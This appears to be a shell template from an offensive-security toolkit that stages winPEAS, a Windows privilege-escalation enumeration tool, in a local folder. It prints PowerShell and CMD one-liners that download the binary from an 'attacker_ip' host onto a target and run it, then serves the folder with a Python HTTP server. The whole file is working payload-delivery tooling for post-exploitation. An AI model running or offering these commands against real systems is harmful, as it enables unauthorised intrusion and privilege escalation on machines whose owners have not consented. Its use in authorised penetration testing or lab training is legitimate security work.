mkdir -p packstation/outbound; cp -n /usr/share/peass/winpeas/* packstation/outbound; \
echo '================================================================'; \
echo '                      -----PowerShell-----                      '; \
echo 'Deliver only (x64): iwr -uri http://<%=$(esh variables/attacker_ip)%>:<%=$(esh variables/delivery_outbound_port)%>/winPEASx64.exe -Outfile <%=$(esh variables/delivery_path_windows)%>\winPEAS.exe'; \
echo 'Deliver only (x86): iwr -uri http://<%=$(esh variables/attacker_ip)%>:<%=$(esh variables/delivery_outbound_port)%>/winPEASx86.exe -Outfile <%=$(esh variables/delivery_path_windows)%>\winPEAS.exe'; \
echo 'Execute only: <%=$(esh variables/delivery_path_windows)%>\winPEAS.exe cmd'; \
echo 'Execute and Save to file: <%=$(esh variables/delivery_path_windows)%>\winPEAS.exe cmd > <%=$(esh variables/delivery_path_windows)%>\report.txt'; \
echo '================================================================'; \
echo '                         -----CMD-----                          '; \
echo 'Deliver only (x64): powershell wget -uri http://<%=$(esh variables/attacker_ip)%>:<%=$(esh variables/delivery_outbound_port)%>/winPEASx64.exe -Outfile <%=$(esh variables/delivery_path_windows)%>\winPEAS.exe'; \
echo 'Deliver only (x86): powershell wget -uri http://<%=$(esh variables/attacker_ip)%>:<%=$(esh variables/delivery_outbound_port)%>/winPEASx86.exe -Outfile <%=$(esh variables/delivery_path_windows)%>\winPEAS.exe'; \
echo '================================================================'; \
python -m http.server <%=$(esh variables/delivery_outbound_port)%> -d packstation/outbound
